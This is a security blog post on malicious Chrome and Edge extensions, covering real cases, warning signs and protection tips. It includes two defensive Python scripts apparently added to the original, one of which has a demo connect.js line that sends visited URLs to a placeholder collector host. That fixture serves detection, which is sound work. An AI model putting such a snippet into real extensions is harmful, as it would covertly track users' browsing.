Dangers of Malicious Browser Extensions.



Fixxx


Researchers from ReasonLabs have reported a new wave of attacks on users of Chrome and Edge browsers through malicious extensions. Cybercriminals distribute the software via fake web pages, but, as practice shows, malicious extensions can also be found in official stores. In this article, we will discuss the capabilities of browser plugins, how to recognize dangerous software and how not to become a victim of cybercriminals.


How Malicious Extensions Work

Browser extensions are software that allows users to enhance the functionality of their browsers. Legitimate extensions have useful features and can significantly ease users' lives, for example: removing pop-up requests for cookie permissions, blocking ads, storing passwords, helping maintain focus or limit time on certain sites, translating text, saving useful tabs and much more. However, not all extensions are safe. Cybercriminals disguise malicious programs as useful and seemingly harmless tools.
  • Malicious extensions often hide under the names of well-known services. Scammers exploit people's trust in popular applications, masking malicious software under their functionality. There have been cases where users downloaded an extension called Chat GPT For Google and then lost access to their social media accounts.
  • Malicious extensions can masquerade as free programs. In this case, installers add a package of extensions to the browser along with the application, which the user may only discover after rebooting the device. Such extensions include pop-up ads that are difficult to get rid of or change the homepage to an obscure search engine that tracks user queries.
To spread their malicious software, cybercriminals create fake pages or disguise it as existing extensions. Sometimes the clones are so skillful that it's almost impossible for a non-specialist to distinguish fake software. An example is the Copyfish extension, which was used for text recognition in images. One of the developers fell victim to phishing and cybercriminals seized the extension's code. Subsequently, they created a clone of Copyfish that inserted ads on the pages visited by the user.

To remain unnoticed, malicious extensions use various masking methods. They often imitate popular and legitimate applications by copying their names, icons and descriptions so that users don't suspect anything suspicious. Another method is to change functionality after installation: initially, the extension behaves legitimately and then, after some time, begins to perform malicious actions. Some extensions minimize their visible activity to avoid attracting attention, operating in the background.

Any user familiar with basic cybersecurity rules knows that software should only be downloaded from reliable, verified sources. However, this is not a guarantee of safety. For instance, cybersecurity researcher Vladimir Palant discovered suspicious code in the PDF Toolbox extension, which was used for working with documents for Google Chrome. Palant continued his search and found another 34 malicious programs in the Chrome Web Store, with a total number of downloads amounting to 87 million times. After several publications, Google removed the dangerous extensions from its store.

Extensions are always visible: unlike scripts and trojans, they appear in the browser's list of installed extensions, which is why they are usually made to look like real, legitimate tools. Often, a malicious extension does perform the function it claims (it may, for example, be a copy of a legitimate extension), but it also performs malicious functions. If an extension was installed not from the store but, for example, by a trojan, cybercriminals may try to protect the extension from removal using a task scheduler or startup objects. If the extension reappears in the list after being removed, this is definitely a reason to investigate the situation carefully.


What is the Danger

To perform their functions, browser extensions request permission from the user for their actions and access to data. Usually, users need to check a box for "View and change your data on all sites". This way, the software gains the ability to monitor all your actions in the browser and can change the content of the opened pages.

The problem is that it's not always possible to determine the safety of an extension, even of an official application, just by reading its permission description. Sometimes the wording is so vague that it's difficult to understand what exactly the extension can do with your data. For example, many extensions require permission to "view and change your data on all sites". This may indeed be necessary for their operation, but such permission grants them almost unlimited rights and can be used for malicious purposes. For large companies, this is also a threat: an employee may store passwords for work email in notes on their phone, thus providing a seemingly harmless application with full access to company data.

The functionality of even a harmless extension allows it to potentially perform the following actions:
  • Collect information about your actions on websites;
  • See confidential information, including card data, logins and passwords;
  • Replace links in search results;
  • Display any ads.
Such capabilities of browser extensions create serious risks for information security. Even if an extension was not initially malicious, its functions may change over time. For example, this happened with Nano Defender and Nano Adblocker. The product was used to bypass ad-blocking protection mechanisms on websites. According to the Chrome Web Store, Nano Defender had over 200k users, while Nano Adblocker had over 100k users when the owner sold it to Turkish developers. After the deal, the new owners uploaded updated versions of the extensions to the store, in which researchers discovered a new file, connect.js. It turned out that the new code fragment allowed developers to send user activity data to remote servers.
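The Nano Defender case above is the reason to look at what an update actually changed rather than trusting the store listing. The following script is an added example, not code from the original post or from the Nano projects: it hashes every file in two installed versions of one extension, lists what was added or changed, and points out new or changed scripts that contain outbound network primitives so a reviewer knows where to look first. The two sample versions, the file names and the collector domain (`collector.invalid`) are constructed for the demo.

```python
"""Compare two installed versions of one extension and flag new or changed scripts.

Added example, not code from the original post. It models the check that
exposed the Nano Defender change: after an update, list the files that
appeared or changed, then point out those that talk to the network.
Sample versions below are constructed; the collector host is a placeholder.
"""
import hashlib
import os
import tempfile

# JavaScript primitives that send data somewhere. Their presence in a file
# that did not exist before the update is worth a human look.
NETWORK_PRIMITIVES = ("fetch(", "XMLHttpRequest", "new WebSocket(", "navigator.sendBeacon")


def snapshot(version_dir):
    """Map relative file path -> SHA-256 for every file under one version dir."""
    inventory = {}
    for dirpath, _, files in os.walk(version_dir):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, version_dir).replace(os.sep, "/")
            with open(full, "rb") as fh:
                inventory[rel] = hashlib.sha256(fh.read()).hexdigest()
    return inventory


def diff_versions(old, new):
    """Classify files as added, removed or changed between two snapshots."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def scripts_with_network_calls(version_dir, paths):
    """Return {path: [primitives found]} for the given .js files that reach the network."""
    hits = {}
    for rel in paths:
        if not rel.endswith(".js"):
            continue
        with open(os.path.join(version_dir, rel), encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        found = [p for p in NETWORK_PRIMITIVES if p in text]
        if found:
            hits[rel] = found
    return hits


def review_update(old_dir, new_dir):
    """Full check: what changed, and which new or changed scripts talk to the network."""
    delta = diff_versions(snapshot(old_dir), snapshot(new_dir))
    delta["network"] = scripts_with_network_calls(new_dir, delta["added"] + delta["changed"])
    return delta


# Constructed sample: v1 is a plain blocker; v2 adds a script that reports
# visited URLs to a remote host (placeholder domain), the pattern the post describes.
SAMPLE_V1 = {
    "manifest.json": '{"name": "Blocker (demo)", "version": "1.0", "background": {"scripts": ["background.js"]}}',
    "background.js": "chrome.webRequest.onBeforeRequest.addListener(() => ({cancel: true}), {urls: ['*://ads.example/*']}, ['blocking']);\n",
}
SAMPLE_V2 = {
    "manifest.json": '{"name": "Blocker (demo)", "version": "1.1", "background": {"scripts": ["background.js", "connect.js"]}}',
    "background.js": SAMPLE_V1["background.js"],
    "connect.js": "chrome.tabs.onUpdated.addListener((id, info) => { if (info.url) fetch('https://collector.invalid/log', {method: 'POST', body: info.url}); });\n",
}


def build_demo_versions():
    """Write both sample versions to temp dirs; returns (v1_dir, v2_dir)."""
    dirs = []
    for files in (SAMPLE_V1, SAMPLE_V2):
        d = tempfile.mkdtemp(prefix="ext-diff-")
        for rel, content in files.items():
            with open(os.path.join(d, rel), "w", encoding="utf-8") as fh:
                fh.write(content)
        dirs.append(d)
    return tuple(dirs)


if __name__ == "__main__":
    old_dir, new_dir = build_demo_versions()
    result = review_update(old_dir, new_dir)
    print("added:  ", result["added"])
    print("changed:", result["changed"])
    for path, prims in result["network"].items():
        print("review %s: uses %s" % (path, ", ".join(prims)))
```

On a real machine the two arguments to `review_update` are the two `<version>` folders that Chromium keeps side by side under `Extensions/<id>/` during an update, or a copy you saved earlier. The token scan is deliberately crude: it does not decide that a script is malicious, it only shortens the list of files a person has to read.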
All types of malicious extensions are dangerous in their own way, and it is difficult to single out one as the most dangerous type. There are extensions that directly steal cryptocurrency – they cause clear and direct harm. However, there are extensions that intercept social media accounts and can even alter search engine results. The damage from such extensions can be much more significant, but over a longer period. Identifying such extensions is quite challenging because even in official extension stores, malicious ones can be found.

In online stores, you can find extensions for every taste and with useful functionality. Friends and colleagues share links and recommend finds to each other. This creates another danger: users download a bunch of extensions without thinking, paying no attention to security. An example is the popular free plugin Hola VPN, which was embroiled in a scandal in 2015. Researchers discovered a number of vulnerabilities in the extension and accused Hola of commercially exploiting users' internet connections and abusing Hola's capabilities to launch DDoS attacks.

Malicious extensions use various masking methods. One of them is disguising as popular extensions, where malicious programs copy the names and icons of well-known applications to mislead users. Additionally, cybercriminals use fake reviews and ratings, creating false high ratings and positive reviews to increase user trust. Some malicious extensions hide their activity, making it minimally noticeable to remain undetected longer.


How to Protect Yourself

As mentioned above, malicious extensions can remain in official stores for years. The reliability of software should be checked by store moderators, but cybercriminals often manage to bypass this filter and place their malicious extensions. Such extensions can be identified by the following signs:
  • The extension requires excessive permissions, such as access to data on all sites or control over system settings.
  • The browser's behavior changed after installing the extension: increased ads, new toolbars or bookmarks appeared.
  • Your data or accounts were compromised after installing a new extension.
To avoid becoming a victim of cybercriminals, you should take precautions when installing: limit the number of extensions and remove unnecessary ones, independently check the reliability of the software by reading reviews in the store and searching for information about it online, read the list of requested permissions and use antivirus software. Here are some ways to independently check an extension for browser security:
  • First, study user reviews and the overall rating of the extension. A low rating or negative reviews should raise suspicion.
  • Then, review the permissions required by the extension. If it requests access that doesn't correspond to its functions (for example, access to browsing history for an ad blocker), this may indicate a potential threat.
  • Investigate who the developer of the extension is. Verified vendors usually have official websites and support.
  • Use antivirus programs. Some of them can scan extensions for malware.
  • Also, pay attention to the frequency of updates for the extension. Frequent updates usually indicate greater reliability.
  • Install extensions cautiously and always check their security to minimize potential risks.
It's also important to remember that if a malicious extension has been detected and removed from the store, it doesn't mean that it will automatically disappear from your device. Therefore, it's worth checking for its presence and removing it manually.
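The permission review in the checklist above (and the "view and change your data on all sites" permission discussed earlier) can be done against the manifests already on disk rather than the store page. The script below is an added example, not code from the original post: it reads `manifest.json` files laid out the way Chromium stores installed extensions (`<profile>/Extensions/<extension id>/<version>/manifest.json`), flags all-site host access and the APIs that give broad visibility or control, and sorts the riskiest first. The sample manifests, names and 32-letter ids are constructed placeholders, not real extensions.

```python
"""Audit installed Chrome/Edge extension manifests for over-broad permissions.

Added example, not code from the original post. Reads manifest.json files in
the Chromium on-disk layout (<profile>/Extensions/<id>/<version>/manifest.json).
Extension ids and names below are constructed placeholders.
"""
import json
import os
import tempfile

# Host patterns that amount to "read and change your data on all websites".
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions that give broad visibility or control over browsing.
BROAD_APIS = {
    "tabs": "see the URL and title of every open tab",
    "webRequest": "observe every HTTP request the browser makes",
    "webRequestBlocking": "modify or block every HTTP request",
    "cookies": "read cookies, including session cookies, on permitted sites",
    "history": "read the full browsing history",
    "clipboardRead": "read the clipboard",
    "nativeMessaging": "talk to a native program outside the browser sandbox",
    "scripting": "inject scripts into permitted pages",
}
# Combined with all-site access, these let an extension read or alter everything.
EXFIL_CAPABLE = {"webRequest", "webRequestBlocking", "cookies", "scripting", "nativeMessaging"}
RISK_RANK = {"high": 0, "medium": 1, "low": 2}


def audit_manifest(manifest):
    """Summarise what a single manifest lets the extension do."""
    # MV2 lists host patterns under `permissions`; MV3 moved them to `host_permissions`.
    declared = list(manifest.get("permissions", []))
    declared += list(manifest.get("host_permissions", []))
    # Content scripts get page access for every pattern they match.
    for script in manifest.get("content_scripts", []):
        declared += list(script.get("matches", []))

    all_sites = sorted({p for p in declared if p in ALL_SITES})
    apis = sorted({p for p in declared if p in BROAD_APIS})

    findings = []
    if all_sites:
        findings.append("read and change data on all websites via " + ", ".join(all_sites))
    findings += ["%s: %s" % (api, BROAD_APIS[api]) for api in apis]

    if all_sites and EXFIL_CAPABLE & set(apis):
        risk = "high"
    elif all_sites or apis:
        risk = "medium"
    else:
        risk = "low"
    return {"name": manifest.get("name", "?"), "version": manifest.get("version", "?"),
            "risk": risk, "findings": findings}


def audit_extensions_dir(root):
    """Audit every <id>/<version>/manifest.json under root, riskiest first."""
    reports = []
    for ext_id in sorted(os.listdir(root)):
        id_dir = os.path.join(root, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for version in sorted(os.listdir(id_dir)):
            path = os.path.join(id_dir, version, "manifest.json")
            if not os.path.isfile(path):
                continue
            with open(path, encoding="utf-8") as fh:
                report = audit_manifest(json.load(fh))
            report["id"] = ext_id
            reports.append(report)
    return sorted(reports, key=lambda r: RISK_RANK[r["risk"]])


# Constructed sample manifests (placeholder ids and names, not real extensions).
SAMPLE_MANIFESTS = {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
        "manifest_version": 3, "name": "Tab Saver (demo)", "version": "1.0",
        "permissions": ["storage", "tabs"],
    },
    "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
        "manifest_version": 3, "name": "PDF Tools (demo clone)", "version": "2.3.1",
        "permissions": ["storage", "scripting", "webRequest", "cookies"],
        "host_permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    },
    "cccccccccccccccccccccccccccccccc": {
        "manifest_version": 2, "name": "Ad Blocker (demo)", "version": "0.9",
        # An ad blocker has no need for history: the mismatch the checklist describes.
        "permissions": ["history", "https://example.com/*"],
    },
}


def build_demo_dir():
    """Write the samples into a temp dir using the Chromium layout; returns its path."""
    root = tempfile.mkdtemp(prefix="ext-audit-")
    for ext_id, manifest in SAMPLE_MANIFESTS.items():
        version_dir = os.path.join(root, ext_id, manifest["version"])
        os.makedirs(version_dir)
        with open(os.path.join(version_dir, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for report in audit_extensions_dir(build_demo_dir()):
        print("[%s] %s %s (%s)" % (report["risk"].upper(), report["name"],
                                   report["version"], report["id"]))
        for finding in report["findings"]:
            print("    -", finding)
```

Point `audit_extensions_dir` at the real `Extensions` folder of a profile to get the same report for what is actually installed. A "high" result is not proof of malice (a password manager legitimately needs all-site access), but it is exactly the case where the checklist says to confirm the developer and the reviews before keeping the extension.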


Conclusion

Browser extensions have evolved from niche software into a full-fledged sub-economy of the internet industry. With the growing popularity of extensions, the number of malicious ones has increased, posing a serious threat to users' security and privacy. Browser extensions have access to user data and can be used for stealing personal information, spreading malware and other illegal activities. However, the risk of infection can be significantly reduced by following simple precautions:
  • Download extensions only from official stores;
  • Limit the number of installed extensions;
  • Use reliable protective solutions.
It's important to remember that even official stores can sometimes contain malicious extensions, so one should always exercise caution and attentiveness when choosing and installing extensions.
 